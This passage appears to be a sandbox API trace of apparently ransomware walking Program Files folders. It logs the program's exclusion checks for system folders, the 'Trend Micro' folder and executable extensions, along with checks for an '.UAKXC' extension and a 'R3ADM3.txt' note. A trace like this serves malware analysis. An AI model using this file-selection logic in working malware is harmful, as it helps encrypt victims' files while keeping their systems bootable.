(lpFirst="Microsoft Synchronization Services", lpSrch="Windows") returned 0x0 [0136.578] StrStrIW (lpFirst="Microsoft Synchronization Services", lpSrch="Trend Micro") returned 0x0 [0136.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0136.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.578] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xed3a78 [0136.579] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.579] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.579] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0136.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67b8 [0136.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xee5378 [0136.579] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3a78 | out: hHeap=0xea0000) returned 1 [0136.579] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdc46ce60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc46ce60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0136.579] lstrcmpW (lpString1="MSBuild", lpString2=".") returned 1 [0136.579] lstrcmpW (lpString1="MSBuild", lpString2="..") returned 1 [0136.579] StrStrIW (lpFirst="MSBuild", lpSrch="tmp") returned 0x0 [0136.579] StrStrIW (lpFirst="MSBuild", lpSrch="winnt") returned 0x0 [0136.579] StrStrIW (lpFirst="MSBuild", lpSrch="temp") returned 0x0 [0136.579] StrStrIW (lpFirst="MSBuild", lpSrch="thumb") returned 0x0 [0136.579] StrStrIW (lpFirst="MSBuild", lpSrch="$Recycle.Bin") returned 0x0 [0136.579] StrStrIW (lpFirst="MSBuild", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.579] StrStrIW (lpFirst="MSBuild", lpSrch="System Volume Information") returned 0x0 [0136.579] StrStrIW (lpFirst="MSBuild", lpSrch="Boot") returned 0x0 [0136.579] StrStrIW (lpFirst="MSBuild", lpSrch="Windows") returned 0x0 [0136.579] StrStrIW (lpFirst="MSBuild", lpSrch="Trend Micro") returned 0x0 [0136.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1ba0 [0136.579] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.579] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee67e0 [0136.579] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0136.579] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1ba0 | out: hHeap=0xea0000) returned 1 [0136.579] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57456bd0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57456bd0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57456bd0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0136.579] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0136.579] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0136.579] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0136.580] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0136.580] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0136.580] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0136.580] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0136.580] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0136.580] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0136.580] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0136.580] lstrcmpW (lpString1="Reference Assemblies", lpString2=".") returned 1 [0136.580] lstrcmpW (lpString1="Reference Assemblies", lpString2="..") returned 1 [0136.580] StrStrIW (lpFirst="Reference Assemblies", lpSrch="tmp") returned 0x0 [0136.580] StrStrIW (lpFirst="Reference Assemblies", lpSrch="winnt") returned 0x0 [0136.580] StrStrIW (lpFirst="Reference Assemblies", lpSrch="temp") returned 0x0 [0136.580] StrStrIW (lpFirst="Reference Assemblies", lpSrch="thumb") returned 0x0 [0136.580] StrStrIW (lpFirst="Reference Assemblies", lpSrch="$Recycle.Bin") returned 0x0 [0136.580] StrStrIW (lpFirst="Reference Assemblies", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.580] StrStrIW (lpFirst="Reference Assemblies", lpSrch="System Volume Information") returned 0x0 [0136.580] StrStrIW (lpFirst="Reference Assemblies", lpSrch="Boot") returned 0x0 [0136.580] StrStrIW (lpFirst="Reference Assemblies", lpSrch="Windows") returned 0x0 [0136.580] StrStrIW (lpFirst="Reference Assemblies", lpSrch="Trend Micro") returned 0x0 [0136.580] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.580] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.580] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0136.580] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0136.580] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee40a8 | out: hHeap=0xea0000) returned 1 [0136.580] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.580] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.580] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6808 [0136.580] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0136.580] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0136.580] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0136.581] lstrcmpW (lpString1="Uninstall Information", lpString2=".") returned 1 [0136.581] lstrcmpW (lpString1="Uninstall Information", lpString2="..") returned 1 [0136.581] StrStrIW (lpFirst="Uninstall Information", lpSrch="tmp") returned 0x0 [0136.581] StrStrIW (lpFirst="Uninstall Information", lpSrch="winnt") returned 0x0 [0136.581] StrStrIW (lpFirst="Uninstall Information", lpSrch="temp") returned 0x0 [0136.581] StrStrIW (lpFirst="Uninstall Information", lpSrch="thumb") returned 0x0 [0136.581] StrStrIW (lpFirst="Uninstall Information", lpSrch="$Recycle.Bin") returned 0x0 [0136.581] StrStrIW (lpFirst="Uninstall Information", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.581] StrStrIW (lpFirst="Uninstall Information", lpSrch="System Volume Information") returned 0x0 [0136.581] StrStrIW (lpFirst="Uninstall Information", lpSrch="Boot") returned 0x0 [0136.581] StrStrIW (lpFirst="Uninstall Information", lpSrch="Windows") returned 0x0 [0136.581] StrStrIW (lpFirst="Uninstall Information", lpSrch="Trend Micro") returned 0x0 [0136.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0136.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0136.581] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee40a8 | out: hHeap=0xea0000) returned 1 [0136.581] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.581] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6830 [0136.581] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0136.581] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0136.581] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdc5e9c20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc5e9c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0136.581] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0136.581] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0136.581] StrStrIW (lpFirst="Windows Defender", lpSrch="tmp") returned 0x0 [0136.581] StrStrIW (lpFirst="Windows Defender", lpSrch="winnt") returned 0x0 [0136.581] StrStrIW (lpFirst="Windows Defender", lpSrch="temp") returned 0x0 [0136.581] StrStrIW (lpFirst="Windows Defender", lpSrch="thumb") returned 0x0 [0136.581] StrStrIW (lpFirst="Windows Defender", lpSrch="$Recycle.Bin") returned 0x0 [0136.581] StrStrIW (lpFirst="Windows Defender", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Defender", lpSrch="System Volume Information") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Defender", lpSrch="Boot") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Defender", lpSrch="Windows") returned="Windows Defender" [0136.582] StrStrIW (lpFirst="Windows Defender", lpSrch=".UAKXC") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Defender", lpSrch=".exe") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Defender", lpSrch=".dll") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Defender", lpSrch=".lnk") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Defender", lpSrch=".sys") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Defender", lpSrch=".msi") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Defender", lpSrch="R3ADM3.txt") returned 0x0 [0136.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0136.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0136.582] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee40a8 | out: hHeap=0xea0000) returned 1 [0136.582] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.582] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0136.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6858 [0136.582] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3340 [0136.582] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2ec8 | out: hHeap=0xea0000) returned 1 [0136.582] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0136.582] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdd373940, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdd373940, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0136.582] lstrcmpW (lpString1="Windows Journal", lpString2=".") returned 1 [0136.582] lstrcmpW (lpString1="Windows Journal", lpString2="..") returned 1 [0136.582] StrStrIW (lpFirst="Windows Journal", lpSrch="tmp") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Journal", lpSrch="winnt") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Journal", lpSrch="temp") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Journal", lpSrch="thumb") returned 0x0 [0136.582] StrStrIW (lpFirst="Windows Journal", lpSrch="$Recycle.Bin") returned 0x0 [0136.583] StrStrIW (lpFirst="Windows Journal", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.583] StrStrIW (lpFirst="Windows Journal", lpSrch="System Volume Information") returned 0x0 [0136.583] StrStrIW (lpFirst="Windows Journal", lpSrch="Boot") returned 0x0 [0136.583] StrStrIW (lpFirst="Windows Journal", lpSrch="Windows") returned="Windows Journal" [0136.583] StrStrIW (lpFirst="Windows Journal", lpSrch=".UAKXC") returned 0x0 [0136.583] StrStrIW (lpFirst="Windows Journal", lpSrch=".exe") returned 0x0 [0136.583] StrStrIW (lpFirst="Windows Journal", lpSrch=".dll") returned 0x0 [0136.583] StrStrIW (lpFirst="Windows Journal", lpSrch=".lnk") returned 0x0 [0136.583] StrStrIW (lpFirst="Windows Journal", lpSrch=".sys") returned 0x0 [0136.583] StrStrIW (lpFirst="Windows Journal", lpSrch=".msi") returned 0x0 [0136.583] StrStrIW (lpFirst="Windows Journal", lpSrch="R3ADM3.txt") returned 0x0 [0136.583] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6880 [0136.583] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.583] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.583] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0136.583] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.583] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.583] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6880 | out: hHeap=0xea0000) returned 1 [0136.583] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0136.583] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6880 [0136.583] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec31e0 [0136.583] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2ec8 | out: hHeap=0xea0000) returned 1 [0136.583] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0136.583] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdc59d960, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc59d960, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0136.583] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0136.583] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0136.583] StrStrIW (lpFirst="Windows Mail", lpSrch="tmp") returned 0x0 [0136.583] StrStrIW (lpFirst="Windows Mail", lpSrch="winnt") returned 0x0 [0136.583] StrStrIW (lpFirst="Windows Mail", lpSrch="temp") returned 0x0 [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch="thumb") returned 0x0 [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch="$Recycle.Bin") returned 0x0 [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch="System Volume Information") returned 0x0 [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch="Boot") returned 0x0 [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch="Windows") returned="Windows Mail" [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch=".UAKXC") returned 0x0 [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch=".exe") returned 0x0 [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch=".dll") returned 0x0 [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch=".lnk") returned 0x0 [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch=".sys") returned 0x0 [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch=".msi") returned 0x0 [0136.584] StrStrIW (lpFirst="Windows Mail", lpSrch="R3ADM3.txt") returned 0x0 [0136.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee68a8 [0136.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1ba0 [0136.584] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.584] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.584] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee68a8 | out: hHeap=0xea0000) returned 1 [0136.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebca98 [0136.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee68a8 [0136.584] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0136.584] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebca98 | out: hHeap=0xea0000) returned 1 [0136.584] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1ba0 | out: hHeap=0xea0000) returned 1 [0136.584] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdc4df280, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc4df280, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0136.584] lstrcmpW (lpString1="Windows Media Player", lpString2=".") returned 1 [0136.584] lstrcmpW (lpString1="Windows Media Player", lpString2="..") returned 1 [0136.584] StrStrIW (lpFirst="Windows Media Player", lpSrch="tmp") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch="winnt") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch="temp") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch="thumb") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch="$Recycle.Bin") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch="System Volume Information") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch="Boot") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch="Windows") returned="Windows Media Player" [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch=".UAKXC") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch=".exe") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch=".dll") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch=".lnk") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch=".sys") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch=".msi") returned 0x0 [0136.585] StrStrIW (lpFirst="Windows Media Player", lpSrch="R3ADM3.txt") returned 0x0 [0136.585] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.585] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.585] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0136.585] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0136.585] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee40a8 | out: hHeap=0xea0000) returned 1 [0136.585] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.585] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.585] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2ec8 [0136.585] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee68d0 [0136.585] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2dc0 [0136.585] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2ec8 | out: hHeap=0xea0000) returned 1 [0136.585] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0136.585] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdc60fd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc60fd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0136.585] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0136.585] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch="tmp") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch="winnt") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch="temp") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch="thumb") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch="$Recycle.Bin") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch="System Volume Information") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch="Boot") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch="Windows") returned="Windows NT" [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch=".UAKXC") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch=".exe") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch=".dll") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch=".lnk") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch=".sys") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch=".msi") returned 0x0 [0136.586] StrStrIW (lpFirst="Windows NT", lpSrch="R3ADM3.txt") returned 0x0 [0136.586] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee68f8 [0136.586] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.586] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.586] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1ba0 [0136.586] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.586] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.586] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee68f8 | out: hHeap=0xea0000) returned 1 [0136.586] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebca98 [0136.586] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee68f8 [0136.586] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcb28 [0136.586] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebca98 | out: hHeap=0xea0000) returned 1 [0136.586] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1ba0 | out: hHeap=0xea0000) returned 1 [0136.586] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdc5053e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, 